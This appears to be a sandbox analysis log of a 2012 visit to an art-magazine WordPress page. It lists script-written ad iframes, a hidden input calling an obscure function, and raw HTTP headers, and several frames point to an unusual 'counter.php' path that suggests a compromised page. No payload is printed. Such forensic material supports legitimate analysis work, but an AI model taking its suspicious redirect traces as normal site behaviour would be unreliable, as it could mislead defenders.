<iframe allowtransparency=true frameborder=0 height=15 hspace=0 id=google_ads_frame1 marginheight=0 marginwidth=0 name=google_ads_frame1 scrolling=no src="http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2219810647891587&format=468x15_0ads_al&output=html&h=15&w=468&lmt=1352305275&channel=1562902687&color_bg=FFFFFF&color_border=330099&color_link=0000FF&color_text=000000&color_url=008000&flash=10.0.45&url=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&dt=1352305277969&bpp=8&shv=r20121031&jsv=r20110914&correlator=1352305278081&frm=22&adk=178692872&ga_vid=792442701.1352305277&ga_sid=1352305277&ga_hid=818000803&ga_fc=1&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=serif&dfs=16&adx=-12245933&ady=-12245933&biw=-12245933&bih=-12245933&isw=1159&ish=3&ifk=3570190657&oid=3&ref=http%3A%2F%2Fartworksmagazine.com%2F2010%2F04%2Fphotography-of-alexis-west%2F&loc=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&fu=0&ifi=1&dtd=424&xpc=LDWjdPVe11&p=http%3A//www.betterjobsearch.com" style="left:0;position:absolute;top:0" vspace=0 width=468></iframe>

#8 JavaScript::Write (size: 1210, repeated: 1)

<iframe allowtransparency=true frameborder=0 height=280 hspace=0 id=google_ads_frame2 marginheight=0 marginwidth=0 name=google_ads_frame2 scrolling=no src="http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2219810647891587&format=336x280_as&output=html&h=280&w=336&lmt=1352305275&channel=1562902687&ad_type=text&color_bg=FFFFFF&color_border=330099&color_link=0000FF&color_text=000000&color_url=008000&flash=10.0.45&url=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&dt=1352305278088&bpp=4&shv=r20121031&jsv=r20110914&prev_fmts=468x15_0ads_al&correlator=1352305278081&pv_ch=1562902687%2B&frm=22&adk=650799283&ga_vid=792442701.1352305277&ga_sid=1352305277&ga_hid=818000803&ga_fc=1&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=serif&dfs=16&adx=-12245933&ady=-12245933&biw=-12245933&bih=-12245933&isw=1159&ish=3&ifk=3570190657&oid=3&ref=http%3A%2F%2Fartworksmagazine.com%2F2010%2F04%2Fphotography-of-alexis-west%2F&loc=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&fu=0&ifi=2&dtd=453&xpc=0L1dHPgTcB&p=http%3A//www.betterjobsearch.com" style="left:0;position:absolute;top:0" vspace=0 width=336></iframe>

#9 JavaScript::Write (size: 812, repeated: 1)

<iframe id="google_ads_frame1" name="google_ads_frame1" width="336" height="280" frameborder="0" src="http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2910537132751306&output=html&h=280&slotname=6394158133&w=336&ea=0&flash=10.0.45&url=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&dt=1352305277758&bpp=6&shv=r20121031&jsv=r20110914&correlator=1352305277913&frm=8&adk=1028924267&ga_vid=1740851937.1352305278&ga_sid=1352305278&ga_hid=506299075&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=arial&dfs=16&adx=-12245933&ady=-12245933&biw=-12245933&bih=-12245933&isw=343&ish=340&ifk=3411974630&oid=3&fu=0&ifi=1&dtd=174" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"></iframe>

#10 JavaScript::Write (size: 1050, repeated: 1)

<iframe name="google_conversion_frame" width="300" height="13" src="http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1049251344/?random=1352305277388&cv=7&fst=1352305277388&num=1&fmt=1&label=JbXSCJiwugMQkJyp9AM&guid=ON&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_his=1&u_tz=60&u_java=true&u_nplug=8&u_nmime=54&ref=http%3A//artworksmagazine.com/2010/04/photography-of-alexis-west/&url=http%3A//www.betterjobsearch.com/jobsearchtools.html/counter.php&frm=2" frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"><img height="1" width="1" border="0" src="http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1049251344/?frame=0&random=1352305277388&cv=7&fst=1352305277388&num=1&fmt=1&label=JbXSCJiwugMQkJyp9AM&guid=ON&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_his=1&u_tz=60&u_java=true&u_nplug=8&u_nmime=54&ref=http%3A//artworksmagazine.com/2010/04/photography-of-alexis-west/&url=http%3A//www.betterjobsearch.com/jobsearchtools.html/counter.php&frm=2" /></iframe>

#11 JavaScript::Write (size: 109, repeated: 1)

<input style="width:0px; top:0px; position:absolute; visibility:hidden;" id="oV6" onchange="fV8(fV1,5,true)">

#12 JavaScript::Write (size: 766, repeated: 1)

<ins style="display:inline-table;border:none;height:15px;margin:0;padding:0;position:relative;visibility:visible;width:468px"><ins id="aswift_0_anchor" style="display:block;border:none;height:15px;margin:0;padding:0;position:relative;visibility:visible;width:468px"><iframe allowtransparency="true" frameborder="0" height="15" hspace="0" marginwidth="0" marginheight="0" onload="var i=this.id,s=window.google_iframe_oncopy,H=s&amp;&amp;s.handlers,h=H&amp;&amp;H[i],w=this.contentWindow,d;try{d=w.document}catch(e){}if(h&amp;&amp;d&amp;&amp;(!d.body||!d.body.firstChild)){if(h.call){setTimeout(h,0)}else if(h.match){w.location.replace(h)}}" scrolling="no" vspace="0" width="468" id=aswift_0 name=aswift_0 style="left:0;position:absolute;top:0;" ></iframe></ins></ins>

#13 JavaScript::Write (size: 769, repeated: 1)

<ins style="display:inline-table;border:none;height:280px;margin:0;padding:0;position:relative;visibility:visible;width:336px"><ins id="aswift_0_anchor" style="display:block;border:none;height:280px;margin:0;padding:0;position:relative;visibility:visible;width:336px"><iframe allowtransparency="true" frameborder="0" height="280" hspace="0" marginwidth="0" marginheight="0" onload="var i=this.id,s=window.google_iframe_oncopy,H=s&amp;&amp;s.handlers,h=H&amp;&amp;H[i],w=this.contentWindow,d;try{d=w.document}catch(e){}if(h&amp;&amp;d&amp;&amp;(!d.body||!d.body.firstChild)){if(h.call){setTimeout(h,0)}else if(h.match){w.location.replace(h)}}" scrolling="no" vspace="0" width="336" id=aswift_0 name=aswift_0 style="left:0;position:absolute;top:0;" ></iframe></ins></ins>

#14 JavaScript::Write (size: 769, repeated: 1)

<ins style="display:inline-table;border:none;height:280px;margin:0;padding:0;position:relative;visibility:visible;width:336px"><ins id="aswift_1_anchor" style="display:block;border:none;height:280px;margin:0;padding:0;position:relative;visibility:visible;width:336px"><iframe allowtransparency="true" frameborder="0" height="280" hspace="0" marginwidth="0" marginheight="0" onload="var i=this.id,s=window.google_iframe_oncopy,H=s&amp;&amp;s.handlers,h=H&amp;&amp;H[i],w=this.contentWindow,d;try{d=w.document}catch(e){}if(h&amp;&amp;d&amp;&amp;(!d.body||!d.body.firstChild)){if(h.call){setTimeout(h,0)}else if(h.match){w.location.replace(h)}}" scrolling="no" vspace="0" width="336" id=aswift_1 name=aswift_1 style="left:0;position:absolute;top:0;" ></iframe></ins></ins>

#15 JavaScript::Write (size: 86, repeated: 2)

<script src="http://pagead2.googlesyndication.com/pagead/expansion_embed.js"></script>

#16 JavaScript::Write (size: 84, repeated: 2)

<script src='http://www.google-analytics.com/ga.js' type='text/javascript'></script>

#17 JavaScript::Write (size: 105, repeated: 3)

<script>google_protectAndRun("ads_core.google_render_ad", google_handleError, google_render_ad);</script>

#18 JavaScript::Write (size: 30, repeated: 1)

<span id="sharethis_0"></span>

#19 JavaScript::Write (size: 2084, repeated: 1)

<style>table.gadget{background-position:0%;background:transparent none;border-collapse:collapse;border:0;clear:none;float:none;font-family:arial,sans-serif;font-style:normal;font-variant:normal;height:auto;letter-spacing:normal;line-height:normal;margin:0;padding:0;text-indent:0;text-transform:none;top:auto;vertical-align:middle;white-space:normal;width:auto;word-spacing:normal;}table.gadget span.title a:hover,table.gadget span.title a:visited,table.gadget span.title a:active,table.gadget span.title{font-size:12px;color:#0000cc}table.gadget span.powered a:hover,table.gadget span.powered a:visited,table.gadget span.powered a:active,table.gadget span.powered{font-size:10px;color:#0000cc}</style><table class="gadget" cellspacing=0 cellpadding=0 width=360><tr><td colspan=2 style="vertical-align:middle;text-align:center;width:100%;height:28px"><span class="title"><a href="http://www.safegamelinks.com" target="_top">Office Etiquette Tips - Click Image </a></span></td></tr><tr><td colspan="2"></td></tr><tr><td colspan=2><div style="background:white;padding:3px; border:1px solid #999999;"><iframe src="http://www-open-opensocial.googleusercontent.com/gadgets/ifr?url=http%3A%2F%2Fnuzs.com%2Fpromotion.xml&container=open&view=home&lang=all&country=ALL&debug=0&nocache=0&sanitize=0&v=232824d3a7ae247c&source=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&parent=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&libs=core%3Acore.io#st=%25st%25" width=360 height=340 style="display:block;" frameborder=0 scrolling="auto"></iframe></div></td></tr><tr><td style="text-align:left;vertical-align:middle;height:28px;"><a href="http://fusion.google.com/ig/add?synd=open&source=ggyp&moduleurl=http://nuzs.com/promotion.xml" target="_top"><img style="border:0;" src="http://www.gmodules.com/ig/images/plus_google.gif"></a></td><td style="text-align:right;vertical-align:middle;height:28px;"><span class="powered"><a href="http://www.google.com/webmasters/gadgets.html" target="_top">Gadgets</a> powered by Google</span></td></tr></table>

#20 JavaScript::Write (size: 840, repeated: 1)

<table cellspacing=0 border=1><tbody><tr><td><TABLE cellspacing=0 border=0 width=220><tbody><TR bgcolor=white><TD><div align=left><table width=100% border=0 cellspacing=3><tbody><tr bgcolor=#E1F0FF><td bgcolor=#E1F0FF><font size=2 face=Verdana><b><a href=http://ppc.adlandpro.com/PK/ppcpreprocessclick.axd?id=50459&amp;aff=285083>Make Money on the Internet Working From Home Starting Today..</a></b></font></td></tr><tr><td valign=top><font size=2 face=Verdana>Real Money-Making system to earn an income on the internet while working from home. Fast and easy anyone can do this. Click on the link to see how..</font></td></tr><tr><td><font size=2 face=Verdana><a href=http://www.adlandpro.com/cmd/process.asp?par=285083_K>Your spot Here</a></font></td></tr></tbody></table></div></TD></TR></tbody></TABLE></td></tr></tbody></table><BR></BR>


HTTP Transactions (232)


Request Response
GET /2010/04/photography-of-alexis-west HTTP/1.1

Host: artworksmagazine.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html; charset=UTF-8
Date: Wed, 07 Nov 2012 16:21:10 GMT
Server: Apache
X-Pingback: http://artworksmagazine.com/xmlrpc.php
Set-Cookie: wassup=c04314bdfff82c6b14a77ce0040c7bf8%3A%3A1352307970; expires=Wed, 07-Nov-2012 17:11:10 GMT; domain=artworksmagazine.com
Location: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
GET /wp-includes/js/comment-reply.js?ver=20090102 HTTP/1.1

Host: artworksmagazine.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Wed, 07 Nov 2012 16:21:11 GMT
Server: Apache
Last-Modified: Thu, 10 Sep 2009 18:32:15 GMT
Etag: &quot;312-4733d6b2aa9c0&quot;
Accept-Ranges: bytes
Content-Length: 786
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
GET /wp-content/themes/arthemia-premium/images/icons/favicon.ico HTTP/1.1

Host: artworksmagazine.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: image/x-icon
Date: Wed, 07 Nov 2012 16:21:11 GMT
Server: Apache
Last-Modified: Tue, 10 Mar 2009 21:21:08 GMT
Etag: &quot;47e-464ca5456f900&quot;
Accept-Ranges: bytes
Content-Length: 1150
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
GET /wp-content/plugins/google-analyticator/external-tracking.js?ver=2.8.4 HTTP/1.1

Host: artworksmagazine.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Wed, 07 Nov 2012 16:21:11 GMT
Server: Apache
Last-Modified: Fri, 04 Mar 2011 20:30:11 GMT
Etag: &quot;32b-49dae033c5ac0&quot;
Accept-Ranges: bytes
Content-Length: 811
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
GET /wp-content/themes/arthemia-premium/style.css HTTP/1.1

Host: artworksmagazine.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
HTTP/1.1 200 OK

Content-Type: text/css
Date: Wed, 07 Nov 2012 16:21:11 GMT
Server: Apache
Last-Modified: Thu, 10 Jun 2010 21:08:35 GMT
Etag: &quot;48e9-488b36cef7ac0&quot;
Accept-Ranges: bytes
Content-Length: 18665
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
GET /2010/04/photography-of-alexis-west/ HTTP/1.1

Host: artworksmagazine.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: wassup=c04314bdfff82c6b14a77ce0040c7bf8%3A%3A1352307970
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Wed, 07 Nov 2012 16:21:10 GMT
Server: Apache
X-Pingback: http://artworksmagazine.com/xmlrpc.php
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /wp-includes/js/jquery/jquery.js?ver=1.3.2 HTTP/1.1

Host: artworksmagazine.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Wed, 07 Nov 2012 16:21:11 GMT
Server: Apache
Last-Modified: Thu, 10 Sep 2009 18:32:17 GMT
Etag: &quot;dfbc-4733d6b492e40&quot;
Accept-Ranges: bytes
Content-Length: 57276
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
GET /wp-content/themes/arthemia-premium/scripts/tabs.js HTTP/1.1

Host: artworksmagazine.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Date: Wed, 07 Nov 2012 16:21:11 GMT
Server: Apache
X-Pingback: http://artworksmagazine.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wassup=c04314bdfff82c6b14a77ce0040c7bf8%3A%3A1352307971; expires=Wed, 07-Nov-2012 17:11:11 GMT; domain=artworksmagazine.com
Last-Modified: Wed, 07 Nov 2012 16:21:11 GMT
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /ga.js HTTP/1.1

Host: www.google-analytics.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
If-Modified-Since: Wed, 19 Sep 2012 11:51:40 GMT
HTTP/1.1 200 OK

Content-Type: text/javascript
Content-Length: 14888
Content-Encoding: gzip
Last-Modified: Mon, 22 Oct 2012 15:51:19 GMT
X-Content-Type-Options: nosniff, nosniff
Date: Wed, 07 Nov 2012 13:13:42 GMT
Expires: Thu, 08 Nov 2012 01:13:42 GMT
Vary: Accept-Encoding
Age: 11250
Cache-Control: max-age=43200, public
Server: GFE/2.0
GET /__utm.gif?utmwv=5.3.7&utms=1&utmn=1081133430&utmhn=artworksmagazine.com&utmcs=UTF-8&utmsr=1176x885&utmvp=1176x778&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=PHOTOGRAPHY%20OF%20ALEXIS%20WEST%20%7C%20Artworks%20Magazine&utmhid=689122624&utmr=-&utmp=%2F2010%2F04%2Fphotography-of-alexis-west%2F&utmac=UA-4497402-1&utmcc=__utma%3D162141804.251416616.1352305272.1352305272.1352305272.1%3B%2B__utmz%3D162141804.1352305272.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&utmu=H~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.7&amp;utms=1&amp;utmn=1081133430&amp;utmhn=artworksmagazine.com&amp;utmcs=UTF-8&amp;utmsr=1176x885&amp;utmvp=1176x778&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmdt=PHOTOGRAPHY%20OF%20ALEXIS%20WEST%20%7C%20Artworks%20Magazine&amp;utmhid=689122624&amp;utmr=-&amp;utmp=%2F2010%2F04%2Fphotography-of-alexis-west%2F&amp;utmac=UA-4497402-1&amp;utmcc=__utma%3D162141804.251416616.1352305272.1352305272.1352305272.1%3B%2B__utmz%3D162141804.1352305272.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&amp;utmu=H~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Thu, 01 Nov 2012 01:30:59 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 571813
Server: GFE/2.0
GET /button/sharethis.js HTTP/1.1

Host: w.sharethis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Server: nginx/1.0.15
Expires: Thu, 08 Nov 2012 16:18:37 GMT
Cache-Control: max-age=86400
Content-Encoding: gzip
Content-Length: 18179
Date: Wed, 07 Nov 2012 16:21:12 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET /button/css/sharethis.f8aeb821aa52b7af5ae4d3675118594c.css HTTP/1.1

Host: w.sharethis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
HTTP/1.1 200 OK

Content-Type: text/css
Server: nginx/1.0.15
Expires: Thu, 07 Nov 2013 16:12:05 GMT
Cache-Control: max-age=31536000
Content-Encoding: gzip
Content-Length: 611
Date: Wed, 07 Nov 2012 16:21:12 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET /avatar/57e53bb6024ff49feeb059b90f5060d3?s=45&d=http%3A%2F%2Fwww.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D45&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/57e53bb6024ff49feeb059b90f5060d3?s=45&amp;d=http%3A%2F%2Fwww.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D45&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
HTTP/1.1 302 Found

Content-Type: text/html; charset=utf-8
Cache-Control: max-age=300
Date: Wed, 07 Nov 2012 16:21:12 GMT
Expires: Wed, 07 Nov 2012 16:26:12 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Location: http://www.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536?s=45
Server: nginx
Source-Age: 0
Via: 1.1 varnish
X-Varnish: 3531058657
Content-Length: 0
GET /avatar/f7db0d8571b2a78957054896dbbbd997?s=45&d=http%3A%2F%2Fwww.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D45&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/f7db0d8571b2a78957054896dbbbd997?s=45&amp;d=http%3A%2F%2Fwww.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D45&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
HTTP/1.1 302 Found

Content-Type: text/html; charset=utf-8
Cache-Control: max-age=300
Date: Wed, 07 Nov 2012 16:21:12 GMT
Expires: Wed, 07 Nov 2012 16:26:12 GMT
Last-Modified: Wed, 30 May 2012 18:45:59 GMT
Location: http://www.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536?s=45
Server: nginx
Source-Age: 0
Via: 1.1 varnish
X-Varnish: 3179504234
Content-Length: 0
GET /avatar/ad516503a11cd5ca435acc9bb6523536?s=45 HTTP/1.1

Host: www.gravatar.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Content-Disposition: inline; filename=&quot;ad516503a11cd5ca435acc9bb6523536.png&quot;
Date: Wed, 07 Nov 2012 16:21:12 GMT
Expires: Wed, 07 Nov 2012 16:26:12 GMT
Last-Modified: Sat, 01 Mar 2008 02:44:06 GMT
Server: ECS (arn/46E6)
Source-Age: 3198
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 4030410948 4028177062
Content-Length: 1160
GET /wp-content/themes/arthemia-premium/scripts/timthumb.php?src=http://artworksmagazine.com/wp-content/uploads//2011/05/Winter-Cover-Web.jpg&w=175&h=150&zc=1&q=100 HTTP/1.1

Host: artworksmagazine.com
GET /wp-content/themes/arthemia-premium/scripts/timthumb.php?src=http://artworksmagazine.com/wp-content/uploads//2011/05/Winter-Cover-Web.jpg&amp;w=175&amp;h=150&amp;zc=1&amp;q=100 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: wassup=c04314bdfff82c6b14a77ce0040c7bf8%3A%3A1352307971; __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/jpeg; charset=binary
Date: Wed, 07 Nov 2012 16:21:12 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=9999, must-revalidate
Expires: Wed, 07 Nov 2012 19:07:51GMT
Last-Modified: Sat, 21 May 2011 14:53:58 GMT
Content-Length: 24919
Etag: 3a451d508be07d684c2face70e6ecf9d
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
GET /wp-includes/js/thickbox/thickbox.js?ver=3.1-20090123 HTTP/1.1

Host: artworksmagazine.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Wed, 07 Nov 2012 16:21:13 GMT
Server: Apache
Last-Modified: Thu, 10 Sep 2009 18:32:23 GMT
Etag: &quot;2f44-4733d6ba4bbc0&quot;
Accept-Ranges: bytes
Content-Length: 12100
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
GET /2467/4039064524_8995580ece_s.jpg HTTP/1.1

Host: farm3.staticflickr.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
HTTP/1.1 200 OK

Content-Type: image/jpeg
